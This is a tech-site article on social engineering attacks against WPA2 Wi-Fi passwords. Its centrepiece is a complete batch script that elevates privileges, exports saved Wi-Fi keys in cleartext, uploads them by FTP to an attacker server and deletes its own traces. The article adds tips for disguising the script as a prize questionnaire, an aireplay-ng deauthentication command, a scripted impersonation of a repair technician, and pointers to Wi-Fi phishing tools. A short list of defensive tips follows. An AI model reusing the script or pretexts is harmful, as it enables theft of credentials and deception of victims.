Common social engineering methods for cracking WPA2 passwords and preventive measures

Common social engineering methods for cracking WPA2 passwords and preventive measures

1. Introduction

What is social engineering? Social engineering is a type of attack that exploits the psychological weaknesses of the victim, such as instinctive reactions, curiosity, sympathy, trust, greed, etc., to perform illegal means such as deception, theft, and control. Social engineering can also be used to perform many illegal operations in wireless security. Here are a few examples of using social engineering to steal wpa2 passwords.

2. Mobile storage attack

A small capacity USB flash drive on Taobao stores a bat batch file in the USB flash drive and names it with titles that entice people to click on it, such as: Windows computer optimization, private photos, etc. In fact, the content of the bat file is this:

  1. @echo off  
  2. > nul 2 > &1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"  
  3. if '%errorlevel%' NEQ '0' (  
  4. goto UACPrompt  
  5. ) else ( goto gotAdmin )  
  6. :UACPrompt  
  7. echo Set UAC = CreateObject ^("Shell.Application"^) > "%temp%\getadmin.vbs"  
  8. echo UAC.ShellExecute "%~s0", "", "", "runas", 1 > > "%temp%\getadmin.vbs"  
  9. "%temp%\getadmin.vbs"  
  10. exit /B  
  11. :gotAdmin  
  12. if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )  
  13. md c:\win  
  14. netsh wlan export profile key = clear   folder = c :\win  
  15. echo open server ip > C:\config.txt  
  16. echo user account > > C:\config.txt  
  17. echo password > > C:\config.txt  
  18. echo mput c:\win\*.xml > > C:\config.txt  
  19. echo yes > > C:\config.txt  
  20. echo yes > > C:\config.txt  
  21. echo yes > > C:\config.txt  
  22. echo yes > > C:\config.txt  
  23. echo yes > > C:\config.txt  
  24. echo yes > > C:\config.txt  
  25. echo yes > > C:\config.txt  
  26. echo yes > > C:\config.txt  
  27. echo yes > > C:\config.txt  
  28. echo yes > > C:\config.txt  
  29. echo yes > > C:\config.txt  
  30. echo yes > > C:\config.txt  
  31. echo yes > > C:\config.txt  
  32. echo yes > > C:\config.txt  
  33. echo yes > > C:\config.txt  
  34. echo yes > > C:\config.txt  
  35. echo yes > > C:\config.txt  
  36. echo yes > > C:\config.txt  
  37. echo yes > > C:\config.txt  
  38. echo yes > > C:\config.txt  
  39. echo yes > > C:\config.txt  
  40. echo yes > > C:\config.txt  
  41. echo yes > > C:\config.txt  
  42. echo yes > > C:\config.txt  
  43. echo yes > > C:\config.txt  
  44. echo yes > > C:\config.txt  
  45. echo yes > > C:\config.txt  
  46. echo yes > > C:\config.txt  
  47. echo yes > > C:\config.txt  
  48. echo yes > > C:\config.txt  
  49. echo yes > > C:\config.txt  
  50. echo yes > > C:\config.txt  
  51. echo yes > > C:\config.txt  
  52. echo yes > > C:\config.txt  
  53. echo yes > > C:\config.txt  
  54. echo yes > > C:\config.txt  
  55. echo yes > > C:\config.txt  
  56. echo yes > > C:\config.txt  
  57. echo yes > > C:\config.txt  
  58. echo yes > > C:\config.txt  
  59. echo yes > > C:\config.txt  
  60. echo yes > > C:\config.txt  
  61. echo yes > > C:\config.txt  
  62. echo yes > > C:\config.txt  
  63. echo yes > > C:\config.txt  
  64. echo yes > > C:\config.txt  
  65. echo yes > > C:\config.txt  
  66. echo yes > > C:\config.txt
  67. echo yes > > C:\config.txt  
  68. echo yes > > C:\config.txt  
  69. echo yes > > C:\config.txt  
  70. echo yes > > C:\config.txt  
  71. echo yes > > C:\config.txt  
  72. echo bye > > C:\config.txt  
  73. ftp -n -s:"C:\config.txt"  
  74. del C:\config.txt  
  75. del C:\win\*.xml  
  76. del %0

This bat script will read the wifi information (including passwords) that the local machine has connected to, pack it into a folder and put it all on the server, then delete the traces and itself to prevent server information leakage. Finally, the attacker can choose the wifi he likes in his own ftp server.

Attack demonstration:

Open this script

The cmd interface pops up and disappears after 1 second (too fast to be captured), and the bat script disappears with it

View FTP Server

Wi-Fi information has been put up

Enter the server and open an xml file

Got the password

You can add functions to it to make the social engineering effect better. For example, you can name the script "Questionnaire with prizes for a certain company" and add a command to open the questionnaire to make the attack invisible.

3. Direct contact with the victim

(1) Using Deauthentication Attack

  1. aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0

During the break after get off work (when the Internet is generally used), the attacker uses the Internet disconnection attack on the victim. After an hour, the attacker knocks on the door and asks if the network is faulty and which company configured the network. Then the attacker claims that his network is also faulty and is from the same company. Then the attacker asks for the repair phone number and dials it. In fact, the attacker dials someone else or does not dial it at all. Then the attacker pretends to be the maintenance personnel and asks the attacker to restart the router. The attacker can then access the victim's router. If the attacker is lucky, there is a pin code on the back of the router, so the attacker can retreat. If not, the attacker applies further pressure and pretends to be asked by the maintenance personnel to open the router management interface and restart the router in the management interface, taking the opportunity to see the password. After the restart is complete, the attacker uses the mobile phone to ssh to Kali to stop the attack, creating the illusion that the restart successfully repaired the network, and then retreats.

(2) Combined with mobile storage attacks, with badusb, the attacker falsely claims that he has important files to send but his phone is out of battery and his family members are not off work yet. On the first day at work, the attacker does not want to leave a bad impression, so he directly accesses the victim's computer, inserts badusb, and executes bat scripts or Trojans.

(3) Claiming to be from a certain company or university and conducting a questionnaire survey on Internet users’ security awareness, they hand over the questionnaire asking for the wifi password to the victim, thereby obtaining the wifi password.

4. Wifi Phishing

Use tools such as fluxion and wifiphisher to carry out phishing attacks:

  • https://github.com/FluxionNetwork/fluxion
  • https://github.com/sophron/wifiphisher ——Project address

The general principle is to capture the handshake packet between the victim client and the wifi, implement a wifi denial of service attack on the target client, send a large number of dissociation packets, and then forge an ap with the same name. After the victim connects to the forged ap, it will be parsed to this page:

After the victim enters the password, it will automatically compare it with the captured handshake packet. If it is correct, the denial of service attack will be stopped. There are many tutorials on wifi phishing on the Internet, so I will not elaborate on them here.

4. Defensive measures

  • Bind mac address, set up whitelist, and only allow your own machine to connect to wifi
  • Hide your Wi-Fi broadcasts to avoid becoming a target
  • Do not insert unknown USB drives, do not open unknown programs, and do not connect to unknown wireless signals.
  • Try not to let strangers have access to your devices
  • It is best to use wpa2 encryption for wifi, and make the password as complex as possible. Try not to use any information related to yourself in the password.
  • Change the router management interface password and wifi password regularly
  • It is best to turn off the wps function on the router
  • Try not to use wifi master key or other similar software

<<:  Five signs SCVMM isn't right for your data center

>>:  The importance of China building 5G networks ahead of the United States

Recommend

HPE acquires Athonet to expand wireless connectivity leadership

HPE (NYSE: HPE) today announced the acquisition o...

Making WAN ubiquitous: SD-WAN still has huge room for development

[[177476]] The impact of globalization has become...

...

Is 5G connectivity the future of IoT?

The three major US mobile operators AT&T, T-M...

Intent-driven networking is reshaping network service delivery

When configuring a network, engineers typically f...

What changes will 6G bring by 2030?

We are in the midst of a great digital wave. Inno...

Google acquires the developer of Job Simulator and plans to develop VR content

Today, Google announced that it has acquired Owlc...

XenSpec: Chicago/San Jose 1Gbps Unlimited VPS Starting at $2.95/month

XenSpec is a foreign hosting company registered s...